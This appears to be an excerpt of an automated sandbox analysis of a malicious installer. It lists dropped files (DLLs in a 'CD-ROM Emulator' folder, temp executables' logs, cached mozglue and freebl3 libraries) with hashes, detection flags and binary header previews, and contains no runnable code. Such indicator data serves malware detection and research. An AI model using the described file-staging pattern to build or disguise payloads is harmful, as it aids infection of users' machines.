Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\languages\is-KDF1U.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3188
Entropy (8bit):	3.820146923376414
Encrypted:	false
SSDEEP:	96:r9BirQRr9DW1t0Y+6HcRMRBm8K+0vNZry19:Jk+9Ot0EcF8K+d19
MD5:	0F16041A3EFE467EE8440060A5ED7F8A
SHA1:	6FB9C518E8F468275B4C821DB8D1F64DEC787687
SHA-256:	C84D2F1177AAD5EA224C68F34DA0CD0C8E7308BA1CC93494B3376F52051FAC93
SHA-512:	C362D7C35425DDA7F98CDD597F0CC1ED0510194022E5AB9AB8EC0EDCCDDD5D9214563C7D038A2A3A5FD103093074E6D3190CA374D838AA3DD4E78F75C9D2BDE3
Malicious:	false
Reputation:	unknown
Preview:	..[.A.P.P.L.I.C.A.T.I.O.N.].....n.a.m.e.=.F.r.e.e. .M.P.3. .C.u.t.t.e.r. .J.o.i.n.e.r.....v.e.r.s.i.o.n.=.V.2.0.2.3...5.....u.r.l.=.h.t.t.p.s.:././.w.w.w...d.v.d.v.i.d.e.o.m.e.d.i.a...c.o.m./.h.o.w.-.t.o.-.c.u.t.-.m.p.3...h.t.m.l.....[.J.I.E.M.I.A.N.].....y.y.=.D.i.l. .S.e...i.m.i.....m.p.3.j.q.=.M.P.3. .K.e.s.i.c.i.....m.p.3.h.b.=.M.P.3. .B.i.r.l.e._.t.i.r.i.c.i.....k.s.j.q.=.B.a._.l.a.n.g.1... .N.o.k.t.a.s.1.:.:.....k.s.j.q.1.=.K.e.s.i.m. .B.a._.l.a.n.g.1.c.1.....j.s.j.q.=.B.i.t.i._. .N.o.k.t.a.s.1.:.....j.q.s.j.=.K.l.i.p. .S...r.e.s.i.:.....y.w.j.=.K.a.y.n.a.k.....k.s.s.j.=.S...r.e. .B.a._.1.....j.s.s.j.=.S...r.e. .S.o.n.u.....s.c.g.s.=...1.k.t.1. .B.i...i.m.i.....o.u.t.p.u.t.=...1.k.t.1. .D.o.s.y.a.s.1.:.....n.y.k.y.z.j.s.r.=.D.o...r.u.d.a.n. .d...z.e.n.l.e.m.e. .d.e.n.e.t.i.m.i. .g.i.r.i._.i. .y.a.p.1.l.a.c.a.k. .z.a.m.a.n. .b.i...i.m.i. .0.0.:.0.0.:.0.0...0.0.0.(.s.a.:.d.a.:.s.n...s.a.l.).....z.t.=.D.u.r.u.m.....z.b.=.H.a.z.1.r.....s.y.m.t.w.j.=.T...m. .S.e.s. .D.o.s.y.a.l.a.r.1.

C:\Users\user\AppData\Local\CD-ROM Emulator\languages\turkish.ini (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3188
Entropy (8bit):	3.820146923376414
Encrypted:	false
SSDEEP:	96:r9BirQRr9DW1t0Y+6HcRMRBm8K+0vNZry19:Jk+9Ot0EcF8K+d19
MD5:	0F16041A3EFE467EE8440060A5ED7F8A
SHA1:	6FB9C518E8F468275B4C821DB8D1F64DEC787687
SHA-256:	C84D2F1177AAD5EA224C68F34DA0CD0C8E7308BA1CC93494B3376F52051FAC93
SHA-512:	C362D7C35425DDA7F98CDD597F0CC1ED0510194022E5AB9AB8EC0EDCCDDD5D9214563C7D038A2A3A5FD103093074E6D3190CA374D838AA3DD4E78F75C9D2BDE3
Malicious:	false
Reputation:	unknown
Preview:	..[.A.P.P.L.I.C.A.T.I.O.N.].....n.a.m.e.=.F.r.e.e. .M.P.3. .C.u.t.t.e.r. .J.o.i.n.e.r.....v.e.r.s.i.o.n.=.V.2.0.2.3...5.....u.r.l.=.h.t.t.p.s.:././.w.w.w...d.v.d.v.i.d.e.o.m.e.d.i.a...c.o.m./.h.o.w.-.t.o.-.c.u.t.-.m.p.3...h.t.m.l.....[.J.I.E.M.I.A.N.].....y.y.=.D.i.l. .S.e...i.m.i.....m.p.3.j.q.=.M.P.3. .K.e.s.i.c.i.....m.p.3.h.b.=.M.P.3. .B.i.r.l.e._.t.i.r.i.c.i.....k.s.j.q.=.B.a._.l.a.n.g.1... .N.o.k.t.a.s.1.:.:.....k.s.j.q.1.=.K.e.s.i.m. .B.a._.l.a.n.g.1.c.1.....j.s.j.q.=.B.i.t.i._. .N.o.k.t.a.s.1.:.....j.q.s.j.=.K.l.i.p. .S...r.e.s.i.:.....y.w.j.=.K.a.y.n.a.k.....k.s.s.j.=.S...r.e. .B.a._.1.....j.s.s.j.=.S...r.e. .S.o.n.u.....s.c.g.s.=...1.k.t.1. .B.i...i.m.i.....o.u.t.p.u.t.=...1.k.t.1. .D.o.s.y.a.s.1.:.....n.y.k.y.z.j.s.r.=.D.o...r.u.d.a.n. .d...z.e.n.l.e.m.e. .d.e.n.e.t.i.m.i. .g.i.r.i._.i. .y.a.p.1.l.a.c.a.k. .z.a.m.a.n. .b.i...i.m.i. .0.0.:.0.0.:.0.0...0.0.0.(.s.a.:.d.a.:.s.n...s.a.l.).....z.t.=.D.u.r.u.m.....z.b.=.H.a.z.1.r.....s.y.m.t.w.j.=.T...m. .S.e.s. .D.o.s.y.a.l.a.r.1.

C:\Users\user\AppData\Local\CD-ROM Emulator\libbz2-1.dll (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105784
Entropy (8bit):	6.258144336244945
Encrypted:	false
SSDEEP:	1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
MD5:	0C6452935851B7CDB3A365AECD2DD260
SHA1:	83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
SHA-256:	F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
SHA-512:	5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\libgcc_s_dw2-1.dll (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	125637
Entropy (8bit):	6.2640431186303145
Encrypted:	false
SSDEEP:	3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
MD5:	6231B452E676ADE27CA0CEB3A3CF874A
SHA1:	F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
SHA-256:	9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
SHA-512:	F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\libiconv-2.dll (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1065100
Entropy (8bit):	7.300961775371533
Encrypted:	false
SSDEEP:	24576:gsRe/8fBAUZLYnwPKO6lbbTCpGavkg3NyeuQ6l9fHOfD:gzKBAUZLYwiO6UpGaXBuQQ9uD
MD5:	B7DF9B43BF812DDAF60C99732C1AB273
SHA1:	4A90353C8B2845008483854642B711E917F9CEEF
SHA-256:	74024FE9B8A1E4F8B9B7561B336B2916A20784699CDEEF2948074F0E820C9BDE
SHA-512:	DB78A8AF90E8557BA37DF1B8C089B8C2E6D912CB08A7B633126541FA9A2E91A0DD90E275A83D323DB0E38BB464744225B0FD405A2C828170B5B7AC1333D6C6E7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........8..:......#...#.....4.................... f................................V>....@... ......................P.......`..............................................................0.......................$a...............................text...............................`.P`.data...T...........................@.0..rdata..............................@.`@/4.......Q.......R..................@.0@.bss.........@........................`..edata.......P......................@.0@.idata.......`......................@.0..CRT....,....p......................@.0..tls................................@.0..rsrc...............................@.0..reloc...............$..............@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\libogg-0.dll (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	40974
Entropy (8bit):	6.485702128133584
Encrypted:	false
SSDEEP:	768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
MD5:	F47E78AD658B2767461EA926060BF3DD
SHA1:	9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
SHA-256:	602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
SHA-512:	216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\libvorbis-0.dll (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	176200
Entropy (8bit):	6.647007817777345
Encrypted:	false
SSDEEP:	1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
MD5:	6896DC57D056879F929206A0A7692A34
SHA1:	D2F709CDE017C42916172E9178A17EB003917189
SHA-256:	8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
SHA-512:	CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\libvorbisenc-2.dll (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	555894
Entropy (8bit):	3.4167624637949925
Encrypted:	false
SSDEEP:	6144:TnOHRuNruVRJ/RbM4YkuYFSwqFux5T8hac1eQ3RcMLQa9gKutRJhuusoAu3FsWVI:2z8wqux5TEacQmRcMcpfLnFQ
MD5:	77A96C1C8E72D12BE4DFA5600A67E0F4
SHA1:	F1A94189F7DA47DB26E332024C255AFAA085A654
SHA-256:	E6A08981AB88E25B892DB826D75EBE4C3A9EC932704F722B3E32E5D9C8CD359C
SHA-512:	267951B1CF2C745DA69265EEF7E921FF4A9F07C49000EB30D3C1793634C6AB61AB3A897E418A56C77C3F8F735AA2844FC6BF564DC2D88C9C0835A37A318AD52B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........v..$......#...#.:...r...............P.....k......................................@... .................................t............................................................Z.........................\|............................text....8.......:..................`.P`.data...D....P.......>..............@.0..rdata..$....`.......@..............@.`@/4......L....`.......@..............@.0@.bss.........p........................0..edata...............L..............@.0@.idata..t............N..............@.0..CRT....,............R..............@.0..tls.................T..............@.0..reloc........... ...V..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\libwinpthread-1.dll (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	68552
Entropy (8bit):	6.1042544770100395
Encrypted:	false
SSDEEP:	768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
MD5:	F06B0761D27B9E69A8F1220846FF12AF
SHA1:	E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
SHA-256:	E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
SHA-512:	5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\setting.ini (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	442
Entropy (8bit):	3.8280681998470794
Encrypted:	false
SSDEEP:	12:Q+gZPiv77qlXS8lvlRFo1MonAUNycdlUlaT9SaG:Q+gZPo7GU0vlRq1pnAUNnd+gTAaG
MD5:	09204E71E9F3B624E909FB20DEFE6EF5
SHA1:	2374900EBB8D9BB7127217DAE828A949B8E7938B
SHA-256:	D0755838EFEF3A423FFF51C91B2AEC497EB6C1A2A845534D6918C433E1F95267
SHA-512:	7B6FE24B112EED282D5795F0D2D122CC71539823609F1F3A7A5B3CAFEC8C86F00B310454B0CB607F881DBA99E7F2E55DD6EEDC31A3CC3D1F2B10FE43A923DE8F
Malicious:	false
Reputation:	unknown
Preview:	..[.L.A.N.G.U.A.G.E.].....n.a.m.e.1.=.E.n.g.l.i.s.h.....n.a.m.e.2.=.E.s.p.a...o.l.....n.a.m.e.3.=.D.e.u.t.s.c.h.....n.a.m.e.4.=.F.r.a.n...a.i.s.....n.a.m.e.5.=.I.t.a.l.i.a.n.o.....n.a.m.e.6.=..e,g......n.a.m.e.7.=.M.a.g.y.a.r.....n.a.m.e.8.=.T...r.k.....n.a.m.e.9.=.'.D.9.1.(.J.).....n.a.m.e.1.0.=.R.o.m...n.......n.a.m.e.1.1.=.A~.-N.e....f.i.l.e.=.e.n.g.l.i.s.h...i.n.i.....[.P.A.T.H.].....n.a.m.e.=.D.:.\.....[.T.I.M.E.S.].....t.i.m.e.=.0.

C:\Users\user\AppData\Local\CD-ROM Emulator\swresample-3.dll (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	129038
Entropy (8bit):	6.508174898498455
Encrypted:	false
SSDEEP:	3072:2n7B3zAWc/gG6IsRc+JdTCXw4hXAMpI3pr:2n7B3zAWc/SmXfAMK
MD5:	3D8C24A40935FB27FC494FC6147E6EA8
SHA1:	C26B6949C34AADB8271E124CE08F511BE5033A04
SHA-256:	F83401305ACDA249D2A81CD8496E08643686FF1327EE4A495A1F3ABD77C7C3E6
SHA-512:	2EC272A4E770FB0B748ED3F3ED9E9A6983B2AB9B88D0C57C63E2248A1EF2B8D8A528EFAAD488CA377DBD05748DFA87DF086DDFA6B0DAD58571C47732320DC958
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.f................................................................@... ...................... .......0..T....`.......................p..x...................................................X1...............................text...$d.......f..................`.P`.data...P............j..............@.P..rdata..PE.......F...l..............@.`@/4.......'.......(..................@.0@.bss..................................0..edata....... ......................@.0@.idata..T....0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..rsrc........`......................@.0..reloc..x....p......................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\unins000.exe (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	716789
Entropy (8bit):	6.514218708009607
Encrypted:	false
SSDEEP:	12288:STPcYn5c/rPx37/zHBA6a5Ueyp2CrIEROlnrNORuYVwRxyF3:aPcYn5c/rPx37/zHBA6pDp2mIEiYCRx4
MD5:	20952E95790242AF37F40CFB1C24C7B2
SHA1:	69B38126E8F9ADB07B1566A27E7A3653C37CD999
SHA-256:	7EFF45B8BE1AB0D08B723548D6AEB3EC9361CEA76AD6A6AE30B86CA40D87A1E9
SHA-512:	064C491E3D466E30CC2DC7A09F11564F6A35CE63468575C162C1E8C4B150E9C2D11178A18CC0191F32E401C8E51F45282792DF7E19D728A521C6E23251E3F490
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................z........................@..............................................@...............................%..................................................................................................................CODE....\y.......z.................. ..`DATA.................~..............@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc...... ......................@..P.rsrc...............................@..P.....................P..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\zlib1.dll (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	127192
Entropy (8bit):	6.479927027421408
Encrypted:	false
SSDEEP:	1536:/fMTf09hjtHy4xaIqGpnuJY8KYA/hKjUR+YABqKBrnToIfqIOoIOGESvrTEgTWjx:XMA3Fa0sYDY6hKgRvwqOTBf4uGE+rYgE
MD5:	8B2A6E8419A8A4E7D3FD023D97455FB9
SHA1:	2547A1F94FB4F83B7C133A3E285EE11FAA155E84
SHA-256:	7087CDD1ACDFF6CD1B8D821388F430AF3888314B05A5821BB53E67034362F670
SHA-512:	44438F6DD4BECABC2CB3053E2C42877CBDB0F309FE272F67A94AD530CAF1C5E5D49BC394F7D21C4226A4F0EB6D8661C5C7113508EA2F446E0DBEA0D59554D4A4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........=......#...#.>...................P.....c.........................`......;.....@... .............................. ...............................P......................................................0!...............................text...d=.......>..................`.P`.data...L....P.......B..............@.0..rdata.. S...`...T...D..............@.`@/4.......2.......4..................@.0@.bss....P.............................`..edata..............................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8BAD.exe.log

Process:	C:\Users\user\AppData\Local\Temp\8BAD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	721
Entropy (8bit):	5.370786586542879
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAnoDLI4MWuPQAYF+QiOKbbDLI4MWuPJKAVKhav:MLU84qpE4K0AE4KIR/KDE4KhKiKhk
MD5:	B33BF4C677B4C39D28621DE1D23B5FDA
SHA1:	EF9F1CBFE2A705FE71F836B100CAC066CB5D758B
SHA-256:	F541E672FA178D649285FFFCE4A285BD7E5711FD9E2E6069EC9640BDDFE39B4D
SHA-512:	D98832F8C6018222CC11A6DCF98A18C7C13DE6051B3E05EAE5BF646507A9EB08201C95104D3520616ABF6D823727DB36427D90DAA59E3D5EEA93589AB45784D7
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Xaml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\4a6b3689887244ce68a20c5d8154ca54\System.Xaml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AF26.exe.log

Process:	C:\Users\user\AppData\Local\Temp\AF26.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1022
Entropy (8bit):	5.215200866635182
Encrypted:	false
SSDEEP:	24:YqHZ6T06MhmamGgb0O0bihmVmGg6CUXyhmGNmGgbxdB6hm3mGgz0Jahm2mGgbNdh:YqHZ6T06McDTb0O0bic4TDUXycRTbxd/
MD5:	BA8512A1180143F7620E106FB9DF5F43
SHA1:	2EF20B9029C7C89ED134DD87F6A9403D4103031F
SHA-256:	171640BF14335CC6403F09E4C72C11146C7393E63A9273C71B98C2D456202BA9
SHA-512:	2B83F9321A98090269D610D552C19B06136719FCD9F310437B2852F938DED711A1D09EABF017BF9AAEA980F68CEC6703234808A5CAB74C9A52AE4903A0DAE797
Malicious:	false
Reputation:	unknown
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":3053123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":3043123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":3033123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3023123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":3013123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3003123472,"LastSwitchedHighPart":31061843,

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
